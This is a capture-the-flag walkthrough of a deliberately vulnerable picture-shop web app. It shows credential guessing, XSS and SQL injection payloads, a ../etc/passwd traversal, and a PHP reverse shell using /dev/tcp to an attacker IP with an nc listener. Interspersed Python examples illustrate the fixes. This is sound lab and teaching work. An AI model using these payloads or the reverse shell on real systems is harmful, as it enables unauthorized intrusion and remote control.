[Task 1] Basic Description & Objectives
[Task 2] Walking through the application
– What version of Apache is being used?
– What language was used to create the website?
– What version of this language is used?
Let’s do the information gathering first.
1. Test web functionality
2. Home section → malicious file upload
![](https://miro.medium.com/max/1205/1*yMgcutLWPQtLpIDQbtv8VA.png)
3. Home section — search → SQL injection, XSS
![](https://miro.medium.com/max/1276/1*p5G-1dfzY2wCAZY38YHf-g.png)
![](https://miro.medium.com/max/1213/1*GjOoSWDeznA-vC9EXXsnUw.png)
4. Home section — create account → SQL Injection
I fill every text box with “test”.
![](https://miro.medium.com/max/1213/1*bUGjA5oc523BzBUNrgSIEQ.png)
![](https://miro.medium.com/max/1193/1*Ptku30Vy8uKYCk-hAh0YQw.png)
It seems like I logged in with user “test”.
5. Test similar name function
![](https://miro.medium.com/max/1215/1*VbzHlAg8igmy2klwjfkhrw.png)
6. Your uploaded pics
![](https://miro.medium.com/max/1199/1*VTLIz5Tp8YDlx1bquF3lQg.png)
7. Your purchased pics
![](https://miro.medium.com/max/1196/1*wC63eHWTZzpX8y8HJ08zxA.png)
8. Back to create account section — Let’s test for password strength → command injection
![](https://miro.medium.com/max/1211/1*Exw3ETxnuyLvQdKxHfAj5A.png)
![](https://miro.medium.com/max/1200/1*ebyE-8jAGn7210xqRJ6dcA.png)
![](https://miro.medium.com/max/1214/1*TGAldmTm08HbBiFKsJr6ug.png)
9. Check out sample user → Broken Access Control
![](https://miro.medium.com/max/1196/1*FOjOPQvNuuSNUy21Djs3xQ.png)
![](https://miro.medium.com/max/1456/1*6i-Uglga-bjz09gbUXyWYQ.png)
10. Check out what is going on today
![](https://miro.medium.com/max/1196/1*i5PT-UNns2T9Ic1ABpDYIQ.png)
Click “What about tomorrow?” until there is a coupon code.
![](https://miro.medium.com/max/1203/1*C5GSZ5TkUm1IqtWyPqKhUA.png)
11. Check upload section
Log in first
![](https://miro.medium.com/max/1000/1*wpzvDXDiIWuIa5gagKDwJw.png)
It’s the same page as we visited before.
![](https://miro.medium.com/max/1000/1*K4ZtuRsFYNnkT1QfSf6smQ.png)
12. Check recent section
![](https://miro.medium.com/max/1000/1*ffFraAqoFqq91vjGCB4tSg.png)
13. Check guestbook section → XSS
![](https://miro.medium.com/max/1000/1*THS3JJG4ke4gcanMuWBDiA.png)
14. Check cart section
![](https://miro.medium.com/max/1000/1*cm2npmnqJLSV0XbGjqh8gg.png)
View a picture and buy it
![](https://miro.medium.com/max/1000/1*jq7_v9tTHXw7kZT4AguV1Q.png)
![](https://miro.medium.com/max/1000/1*GToc-VoiY17tlKmTSrWEKQ.png)
![](https://miro.medium.com/max/1000/1*d7BS5aErWnPVtN1t0QQe2w.png)
![](https://miro.medium.com/max/1000/1*mL99cH552Dfy8b9EfNT5cA.png)
15. Let’s view the bottom section → Password guessing, Brute-forcing, SQL injection
Admin
![](https://miro.medium.com/max/758/1*PEh83kS5PC-VEop0S13IJw.png)
Contact
Terms of service
![](https://miro.medium.com/max/1215/1*_DkCsFWulP09rqSQtthq4Q.png)
16. Search web paths with dirbuster
Results — I visited every link, but none of them is interesting.
![](https://miro.medium.com/max/973/1*9VROqNI1PeEyslah7ZqUUg.png)
17. Search site’s vulnerabilities and information.
nikto -h http://10.10.92.34/
![](https://miro.medium.com/max/1751/1*uvSTBpuKj-_SSwhT2w9sWg.png)
18. Answer the questions
– What version of Apache is being used? 2.4.7
– What language was used to create the website? PHP
– What version of this language is used? 5.5.9
Conclusion
There are potential vulnerabilities:
1. Malicious file upload
2. SQL injection
3. XSS
4. Command injection
5. Broken Access Control
6. Password guessing
7. Brute-forcing
[Task 3] Establishing a methodology
[Task 4] Authentication
– What is the admin username?
– What is the admin password?
– What is the name of the cookie that can be manipulated?
– What is the username of a logged on user?
– What is the corresponding password to the username?
1. Let’s try guessing the admin username and password. There are 4 combinations that I can think of:
– admin:admin
– admin:password
– root:root
– root:password
2. Let’s log in to the Login Panel
None of the combinations worked.
![](https://miro.medium.com/max/1204/1*A3aZf45l21gQzSf0CshWPg.png)
3. Let’s log in to the Admin Panel
Luckily, “admin:admin” worked.
![](https://miro.medium.com/max/509/1*4G-LtMU2JAndby37HwP4SA.png)
I clicked “Create a new user!”, but nothing worked.
![](https://miro.medium.com/max/793/1*sz4Ocx_jXlnkpp4X42bK_g.png)
![](https://miro.medium.com/max/1566/1*zDPeZaP0jC5r4KvUvy6bJA.png)
To answer the question
– What is the admin username? admin
– What is the admin password? admin
4. Let’s try to find the cookie.
Back to the home page
![](https://miro.medium.com/max/1238/1*Wy-Sy7dlTfvSjBXEv3UNGQ.png)
Inspect Element
![](https://miro.medium.com/max/359/1*Fjhx70M10XcuRGk_YqoL-A.png)
In the console tab, type
alert(document.cookie)
![](https://miro.medium.com/max/751/1*_MVuaPwDGp82JhviKAv6iA.png)
There’s PHPSESSID, but it’s the wrong answer.
![](https://miro.medium.com/max/494/1*xbL3G-DpD-20W2b6SrEfZg.png)
Let’s try the same method again in the admin panel.
![](https://miro.medium.com/max/1274/1*dDBkZbeLuOH9IDHkv3UQGA.png)
To answer the question
– What is the name of the cookie that can be manipulated? session
5. Let’s access other user data
Click “Check out a sample user!”
![](https://miro.medium.com/max/629/1*azr-0VcNcwCGTUrajHpFkw.png)
Try to break access control by manipulating the userid parameter
![](https://miro.medium.com/max/821/1*6rcKGILF1mez7_AtQUSrMA.png)
These pictures show potential users:
– Bob
– scanner1
– scanner2
– scanner3
![](https://miro.medium.com/max/633/1*K7z_cp5zwVyT4HKALHGXfg.png)
– scanner4
![](https://miro.medium.com/max/659/1*Z15IutPLaAuxD7hL0MLS-A.png)
– scanner5
![](https://miro.medium.com/max/610/1*5GCYzBVLjEcLNmAqxWm1GA.png)
– wanda
![](https://miro.medium.com/max/555/1*Acc67BNFUN8lQn5_pYhpJg.png)
– calvinwatters
![](https://miro.medium.com/max/618/1*uO_EXVV9DfbrWftwDa1MGQ.png)
– bryce
I tried userid 12 and 13, but they return an empty page. I’ll stop listing users for now.
In conclusion, there are 9 potential users. I’ll try password guessing first with this list:
Bob → Bob:Bob, bob:bob
scanner1 → scanner1:scanner1
scanner2 → scanner2:scanner2
scanner3 → scanner3:scanner3
scanner4 → scanner4:scanner4
scanner5 → scanner5:scanner5
wanda → wanda:wanda
calvinwatters → calvinwatters:calvinwatters
bryce → bryce:bryce
Luckily, I could log in with bryce:bryce.
To answer the question
– What is the username of a logged on user? bryce
– What is the corresponding password to the username? bryce
[Task 5] Cross Site Scripting (XSS)
I used the cheat sheet from https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
<iframe src="javascript:alert(1)">
1. Test for XSS on the search bar
2. Test for XSS on the guestbook page
Name: <iframe src="javascript:alert(1)">
Comment: test
It did not work.
Let’s try again
Name: test
Comment: <iframe src="javascript:alert(1)">
3. Test for XSS behind the flash form on the home page → I skipped this because Flash Player is turned off.
[Task 6] Injection
– Perform command injection on the check password field
– Check for SQLi on the application
1. Perform command injection on the check password field — I skipped this because when I perform the injection, the machine breaks itself.
2. Check for SQLi on the application
In the login page, put
' or 1=1--
It did not work, though.
Let’s try it in the “register an account” page
It works!!!
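Why the `' or 1=1--` input above changes a query, and how a parameterized query resists it, shown as an added Python/sqlite3 example rather than the room's own PHP code; the table, the sample rows and both query styles are constructed here for illustration (the demo stores plaintext passwords only to keep it short).

```python
import sqlite3

# Constructed sample users; the room's real schema is not shown on the page.
SAMPLE_USERS = [("bryce", "bryce"), ("wanda", "wanda")]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return db


def vulnerable_login(db, username, password):
    # String-built query: the quote in the input closes the string literal,
    # "or 1=1" makes the WHERE clause always true, and "--" comments out the
    # password check, so the first user in the table comes back.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(db, username, password):
    # Parameterized query: the driver binds the input as a value, so the
    # same payload is compared literally against the username column.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


PAYLOAD = "' or 1=1--"
```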
[Task 7] Miscellaneous & Logic Flaws
– Find a parameter manipulation vulnerability
– Find a directory traversal vulnerability
– Find a forceful browsing vulnerability
– Logic flaw: try to get an item for free
1. Find a parameter manipulation vulnerability — already done in Task 4 number 5
2. Find a directory traversal vulnerability
In the “upload a picture” section, I type this as the file name and upload some files.
../etc/passwd
![](https://miro.medium.com/max/523/1*mBqgMPoGS-WICJC6sMTkuw.png)
Now, I get the path
![](https://miro.medium.com/max/1093/1*nlaLvNhy29ocbXztbMtK9w.png)
Let’s type
http://<ip>/upload/
![](https://miro.medium.com/max/670/1*NP4oQdxqDu_OpbA6Jn9N9g.png)
Try to upload a reverse shell
Here’s my PHP reverse shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.21.124/1234 0>&1'");?>
Upload it
![](https://miro.medium.com/max/690/1*_6onbdFihwl_9HD3eV_ROw.png)
Upload succeeded
![](https://miro.medium.com/max/859/1*MNRrBm1ULmceryCarPsvng.png)
Check in /upload
![](https://miro.medium.com/max/654/1*o79oEvTPE-fGaCXAqBK9jg.png)
![](https://miro.medium.com/max/776/1*oZpYCJtcLK5IM_s8K4O9kg.png)
Back to the attacker’s machine
nc -lvp 1234
Click on the file
![](https://miro.medium.com/max/760/1*kyowloImLSItrqdh662jpQ.png)
Back to the attacker’s machine: now we have a shell
![](https://miro.medium.com/max/945/1*YAO3-K20s1yQWusatkXy3w.png)
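The server-side checks that would have stopped both the `../etc/passwd` file name and the `.php` upload shown above, as an added Python example that is not the room's code; the allowed image types, their signatures and the random server-chosen file name are assumptions, since the page does not show the upload handler.

```python
import os
import secrets

# Allowed image types and their leading magic bytes (assumption: the gallery
# only needs PNG, JPEG and GIF; the page does not state the real rules).
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def validate_upload(client_name, head):
    """Return (accepted, detail): detail is a rejection reason, or the
    server-chosen file name the upload should be stored under."""
    # 1. Only a bare file name is acceptable: "../etc/passwd" and backslash
    #    variants must never reach a filesystem path.
    if (not client_name
            or client_name != os.path.basename(client_name)
            or ".." in client_name or "\\" in client_name):
        return False, "path component in filename"
    # 2. Extension allow-list: "shell.php" is refused outright.
    ext = os.path.splitext(client_name)[1].lower()
    if ext not in MAGIC:
        return False, f"extension {ext or '(none)'} not allowed"
    # 3. Content must match the claimed type: "<?php ..." renamed to .png fails.
    if not head.startswith(MAGIC[ext]):
        return False, "content does not match extension"
    # 4. Never reuse the client name; store under a random server-chosen one.
    return True, secrets.token_hex(8) + ext
```

Independently of these checks, the upload directory should be served with script execution disabled, so that a file which does slip through is returned as data rather than run.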
3. Find a forceful browsing vulnerability
Try to buy an image
![](https://miro.medium.com/max/1274/1*zLvpxvlzeFt0mv4xDrz-dQ.png)
Before purchasing it, users can already access the high-quality image
![](https://miro.medium.com/max/1201/1*L9aP1bOL_JoS7Y4qHThIVg.png)
4. Logic flaw: try to get an item for free
In the home section, click “What is going on today?”
![](https://miro.medium.com/max/538/1*OFs9qVD7lhfujT5GMYZyIQ.png)
Click “What about tomorrow?” until I have the coupon code: SUPERYOU21
![](https://miro.medium.com/max/494/1*WQezWFAKSd4nUvSWBS-2sg.png)
Back to the cart. Try to apply the coupon twice
![](https://miro.medium.com/max/738/1*IFXJK3PsWwlkfxJ5QaaAuw.png)
Apply it until I don’t have to pay
![](https://miro.medium.com/max/621/1*F-C0n9IBkI8Qujtm6f9Qkg.png)
![](https://miro.medium.com/max/649/1*5G6COwT4ni6DCXYc8rgXug.png)
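The coupon flaw above, modelled and then fixed in an added Python example that is not the room's code; the item price and the discount value of SUPERYOU21 are constructed, since the page shows the code but not its amount.

```python
# Prices are in cents to avoid float rounding. The page shows the code
# SUPERYOU21 but not its value, so a flat 500-cent discount is assumed.
COUPONS = {"SUPERYOU21": 500}


class Cart:
    def __init__(self, item_price_cents):
        self.item_price = item_price_cents   # catalogue price, server-side
        self.total = item_price_cents        # running total shown to the user
        self.applied = set()                 # coupons already used on this cart


def apply_coupon_vulnerable(cart, code):
    # Flaw: the handler only subtracts from the running total and never
    # records that the code was used, so every repeat click is honoured
    # until the total reaches zero or even goes negative.
    cart.total -= COUPONS.get(code, 0)
    return cart.total


def apply_coupon_fixed(cart, code):
    # Fix: a coupon is applied at most once per cart, the total is
    # recomputed from the catalogue price rather than from the previous
    # total, and the result is clamped so a discount cannot exceed the price.
    if code not in COUPONS:
        raise ValueError("unknown coupon")
    if code in cart.applied:
        raise ValueError("coupon already applied to this cart")
    cart.applied.add(code)
    discount = sum(COUPONS[c] for c in cart.applied)
    cart.total = max(cart.item_price - discount, 0)
    return cart.total


def clicks_until_free(price_cents, code):
    # How many "apply" clicks the vulnerable handler needs to reach zero.
    if COUPONS.get(code, 0) <= 0:
        return 0
    cart = Cart(price_cents)
    clicks = 0
    while cart.total > 0:
        apply_coupon_vulnerable(cart, code)
        clicks += 1
    return clicks
```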
That’s all. Thanks!
Reproduction without permission is prohibited: 萌萌guo angline - Apprentissage » WebAppSec 101